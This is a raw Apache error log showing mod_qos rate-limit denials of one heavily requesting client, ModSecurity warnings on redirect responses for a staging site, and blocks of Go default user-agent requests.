[Tue May 26 19:59:40.219192 2026] [qos:error] [pid 93576:tid 93775] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszziwAAAD8
[Tue May 26 19:59:40.220557 2026] [qos:error] [pid 93576:tid 93717] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzjAAAAAU
[Tue May 26 19:59:40.223795 2026] [qos:error] [pid 93868:tid 94281] [client 45.148.10.120:35288] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVEqK9k_ZUB2Vp259awAAAaY
[Tue May 26 19:59:40.225522 2026] [qos:error] [pid 93576:tid 93829] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzjQAAAHU
[Tue May 26 19:59:40.226022 2026] [qos:error] [pid 93868:tid 94263] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVEqK9k_ZUB2Vp259bAAAAZQ
[Tue May 26 19:59:40.230502 2026] [qos:error] [pid 93576:tid 93712] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzjgAAAAA
[Tue May 26 19:59:40.235240 2026] [qos:error] [pid 93576:tid 93758] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzjwAAAC4
[Tue May 26 19:59:40.240020 2026] [qos:error] [pid 93868:tid 94335] [client 45.148.10.120:34936] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVEqK9k_ZUB2Vp259bgAAAdw
[Tue May 26 19:59:40.246588 2026] [qos:error] [pid 93576:tid 93737] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzkAAAABk
[Tue May 26 19:59:40.274713 2026] [security2:error] [pid 93576:tid 93767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUmDRMqfxdEDkoszzJAAAADc"]
[Tue May 26 19:59:40.282047 2026] [security2:error] [pid 93868:tid 94354] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUkqK9k_ZUB2Vp2584QAAAe8"]
[Tue May 26 19:59:40.284414 2026] [security2:error] [pid 93868:tid 94374] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUkqK9k_ZUB2Vp2582wAAAgM"]
[Tue May 26 19:59:40.284514 2026] [security2:error] [pid 106517:tid 106653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUoZZc2DoU1lPnP1Q8wAAAIg"]
[Tue May 26 19:59:40.290942 2026] [security2:error] [pid 93868:tid 94359] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUkqK9k_ZUB2Vp2586QAAAfQ"]
[Tue May 26 19:59:40.300081 2026] [security2:error] [pid 93868:tid 94328] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUkqK9k_ZUB2Vp2584gAAAdU"]
[Tue May 26 19:59:40.305204 2026] [security2:error] [pid 93868:tid 94350] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUkqK9k_ZUB2Vp2586gAAAes"]
[Tue May 26 19:59:40.311567 2026] [security2:error] [pid 93868:tid 94308] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUkqK9k_ZUB2Vp2585wAAAcE"]
[Tue May 26 19:59:40.311814 2026] [security2:error] [pid 93576:tid 93770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUmDRMqfxdEDkoszzMQAAADo"]
[Tue May 26 19:59:40.320642 2026] [security2:error] [pid 93576:tid 93728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUmDRMqfxdEDkoszzMAAAABA"]
[Tue May 26 19:59:40.322234 2026] [security2:error] [pid 106517:tid 106771] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU4ZZc2DoU1lPnP1RCAAAAP0"]
[Tue May 26 19:59:40.337807 2026] [security2:error] [pid 93868:tid 94372] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUkqK9k_ZUB2Vp2588AAAAgE"]
[Tue May 26 19:59:40.338200 2026] [security2:error] [pid 93576:tid 93731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU2DRMqfxdEDkoszzUwAAABM"]
[Tue May 26 19:59:40.346367 2026] [security2:error] [pid 106517:tid 106746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU4ZZc2DoU1lPnP1RCQAAAOQ"]
[Tue May 26 19:59:40.347186 2026] [security2:error] [pid 93868:tid 94285] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUkqK9k_ZUB2Vp2587gAAAao"]
[Tue May 26 19:59:40.357874 2026] [security2:error] [pid 106517:tid 106716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU4ZZc2DoU1lPnP1REAAAAMY"]
[Tue May 26 19:59:40.360647 2026] [security2:error] [pid 106517:tid 106776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU4ZZc2DoU1lPnP1RGgAAAQI"]
[Tue May 26 19:59:40.361869 2026] [security2:error] [pid 106517:tid 106761] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU4ZZc2DoU1lPnP1RBwAAAPM"]
[Tue May 26 19:59:40.362091 2026] [security2:error] [pid 93576:tid 93778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU2DRMqfxdEDkoszzUQAAAEI"]
[Tue May 26 19:59:40.363723 2026] [security2:error] [pid 106517:tid 106669] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU4ZZc2DoU1lPnP1RGwAAAJg"]
[Tue May 26 19:59:40.376944 2026] [security2:error] [pid 106517:tid 106666] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU4ZZc2DoU1lPnP1RIwAAAJU"]
[Tue May 26 19:59:40.388538 2026] [security2:error] [pid 106517:tid 106768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU4ZZc2DoU1lPnP1RCgAAAPo"]
[Tue May 26 19:59:40.389709 2026] [security2:error] [pid 93576:tid 93793] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUmDRMqfxdEDkoszzMwAAAFE"]
[Tue May 26 19:59:40.408908 2026] [security2:error] [pid 93868:tid 94348] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU0qK9k_ZUB2Vp259LgAAAek"]
[Tue May 26 19:59:40.417750 2026] [security2:error] [pid 106517:tid 106775] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU4ZZc2DoU1lPnP1RDAAAAQE"]
[Tue May 26 19:59:40.419854 2026] [security2:error] [pid 106517:tid 106676] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU4ZZc2DoU1lPnP1RGQAAAJ8"]
[Tue May 26 19:59:40.421745 2026] [security2:error] [pid 106517:tid 106738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU4ZZc2DoU1lPnP1RMwAAANw"]
[Tue May 26 19:59:40.435879 2026] [security2:error] [pid 93868:tid 94272] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU0qK9k_ZUB2Vp259PgAAAZ0"]
[Tue May 26 19:59:40.452817 2026] [security2:error] [pid 106517:tid 106657] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU4ZZc2DoU1lPnP1RIgAAAIw"]
[Tue May 26 19:59:40.493071 2026] [core:error] [pid 93576:tid 93772] [client 185.135.69.34:36582] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:59:40.493092 2026] [core:error] [pid 93576:tid 93772] [client 185.135.69.34:36582] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:59:40.529118 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuVGDRMqfxdEDkoszzugAAAHs
[Tue May 26 19:59:40.529382 2026] [qos:error] [pid 106517:tid 106721] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuVIZZc2DoU1lPnP1RgwAAAMs
[Tue May 26 19:59:40.534887 2026] [security2:error] [pid 93576:tid 93781] [client 103.163.220.30:28569] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/"] [unique_id "ahWuVGDRMqfxdEDkoszzuwAAAEU"]
[Tue May 26 19:59:40.541330 2026] [qos:error] [pid 93576:tid 93779] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzvAAAAEM
[Tue May 26 19:59:40.553465 2026] [qos:error] [pid 93576:tid 93769] [client 45.148.10.120:35090] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzvQAAADk
[Tue May 26 19:59:40.563741 2026] [qos:error] [pid 93868:tid 94260] [client 45.148.10.120:34972] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVEqK9k_ZUB2Vp259kAAAAZE
[Tue May 26 19:59:40.571373 2026] [qos:error] [pid 93576:tid 93823] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzvgAAAG8
[Tue May 26 19:59:40.574671 2026] [qos:error] [pid 93576:tid 93817] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzvwAAAGk
[Tue May 26 19:59:40.578959 2026] [qos:error] [pid 93868:tid 94374] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVEqK9k_ZUB2Vp259kQAAAgM
[Tue May 26 19:59:40.591698 2026] [qos:error] [pid 93576:tid 93741] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzwAAAAB0
[Tue May 26 19:59:40.605654 2026] [qos:error] [pid 93868:tid 94365] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVEqK9k_ZUB2Vp259kgAAAfo
[Tue May 26 19:59:40.685490 2026] [qos:error] [pid 93868:tid 94359] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVEqK9k_ZUB2Vp259lAAAAfQ
[Tue May 26 19:59:40.685494 2026] [qos:error] [pid 93868:tid 94373] [client 45.148.10.120:35142] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuVEqK9k_ZUB2Vp259kwAAAgI
[Tue May 26 19:59:40.690675 2026] [qos:error] [pid 93576:tid 93802] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzwQAAAFo
[Tue May 26 19:59:40.703019 2026] [qos:error] [pid 93576:tid 93724] [client 45.148.10.120:35090] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzwgAAAAw
[Tue May 26 19:59:40.713923 2026] [qos:error] [pid 93868:tid 94332] [client 45.148.10.120:34972] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVEqK9k_ZUB2Vp259lQAAAdk
[Tue May 26 19:59:40.723600 2026] [qos:error] [pid 93576:tid 93814] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzwwAAAGY
[Tue May 26 19:59:40.727950 2026] [qos:error] [pid 93576:tid 93824] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzxAAAAHA
[Tue May 26 19:59:40.731248 2026] [qos:error] [pid 93868:tid 94375] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVEqK9k_ZUB2Vp259lgAAAgQ
[Tue May 26 19:59:40.746245 2026] [qos:error] [pid 93576:tid 93743] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzxQAAAB8
[Tue May 26 19:59:40.753550 2026] [qos:error] [pid 93868:tid 94328] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVEqK9k_ZUB2Vp259lwAAAdU
[Tue May 26 19:59:40.934218 2026] [qos:error] [pid 93868:tid 94308] [client 45.148.10.120:34972] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVEqK9k_ZUB2Vp259mwAAAcE
[Tue May 26 19:59:40.935745 2026] [qos:error] [pid 93868:tid 94323] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVEqK9k_ZUB2Vp259nAAAAdA
[Tue May 26 19:59:40.935848 2026] [qos:error] [pid 93576:tid 93833] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzyQAAAHk
[Tue May 26 19:59:40.935965 2026] [qos:error] [pid 93576:tid 93799] [client 45.148.10.120:35090] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzygAAAFc
[Tue May 26 19:59:40.936220 2026] [qos:error] [pid 93868:tid 94361] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVEqK9k_ZUB2Vp259nQAAAfY
[Tue May 26 19:59:40.938607 2026] [qos:error] [pid 93576:tid 93767] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzzAAAADc
[Tue May 26 19:59:40.938785 2026] [qos:error] [pid 93868:tid 94334] [client 45.148.10.120:35142] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVEqK9k_ZUB2Vp259ngAAAds
[Tue May 26 19:59:40.938859 2026] [qos:error] [pid 93576:tid 93725] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzywAAAA0
[Tue May 26 19:59:40.939859 2026] [qos:error] [pid 93868:tid 94312] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVEqK9k_ZUB2Vp259nwAAAcU
[Tue May 26 19:59:40.941504 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzzQAAADI
[Tue May 26 19:59:41.082098 2026] [security2:error] [pid 93576:tid 93751] [client 103.163.220.41:50181] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/inputs.php"] [unique_id "ahWuVWDRMqfxdEDkoszz0QAAACc"]
[Tue May 26 19:59:41.154056 2026] [qos:error] [pid 93576:tid 93765] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVWDRMqfxdEDkoszz1AAAADU
[Tue May 26 19:59:41.154456 2026] [qos:error] [pid 93576:tid 93784] [client 45.148.10.120:35090] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVWDRMqfxdEDkoszz1QAAAEg
[Tue May 26 19:59:41.154701 2026] [qos:error] [pid 93868:tid 94381] [client 45.148.10.120:34972] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVUqK9k_ZUB2Vp259pQAAAgo
[Tue May 26 19:59:41.155655 2026] [qos:error] [pid 93868:tid 94275] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVUqK9k_ZUB2Vp259pgAAAaA
[Tue May 26 19:59:41.161132 2026] [qos:error] [pid 93576:tid 93800] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVWDRMqfxdEDkoszz1gAAAFg
[Tue May 26 19:59:41.163561 2026] [qos:error] [pid 93576:tid 93768] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVWDRMqfxdEDkoszz1wAAADg
[Tue May 26 19:59:41.275864 2026] [security2:error] [pid 106517:tid 106664] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU4ZZc2DoU1lPnP1RQQAAAJM"]
[Tue May 26 19:59:41.282202 2026] [security2:error] [pid 106517:tid 106697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU4ZZc2DoU1lPnP1RKQAAALM"]
[Tue May 26 19:59:41.287947 2026] [security2:error] [pid 93868:tid 94265] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU0qK9k_ZUB2Vp259PwAAAZY"]
[Tue May 26 19:59:41.288918 2026] [security2:error] [pid 106517:tid 106661] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU4ZZc2DoU1lPnP1RQwAAAJA"]
[Tue May 26 19:59:41.291404 2026] [security2:error] [pid 93868:tid 94345] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU0qK9k_ZUB2Vp259OgAAAeY"]
[Tue May 26 19:59:41.296241 2026] [security2:error] [pid 106517:tid 106727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU4ZZc2DoU1lPnP1RPwAAANE"]
[Tue May 26 19:59:41.297056 2026] [security2:error] [pid 106517:tid 106674] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU4ZZc2DoU1lPnP1RKAAAAJ0"]
[Tue May 26 19:59:41.300267 2026] [security2:error] [pid 93868:tid 94355] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU0qK9k_ZUB2Vp259QQAAAfA"]
[Tue May 26 19:59:41.301454 2026] [security2:error] [pid 106517:tid 106703] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU4ZZc2DoU1lPnP1RRAAAALk"]
[Tue May 26 19:59:41.306428 2026] [security2:error] [pid 106517:tid 106737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU4ZZc2DoU1lPnP1RSQAAANs"]
[Tue May 26 19:59:41.307594 2026] [security2:error] [pid 106517:tid 106701] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU4ZZc2DoU1lPnP1RRQAAALc"]
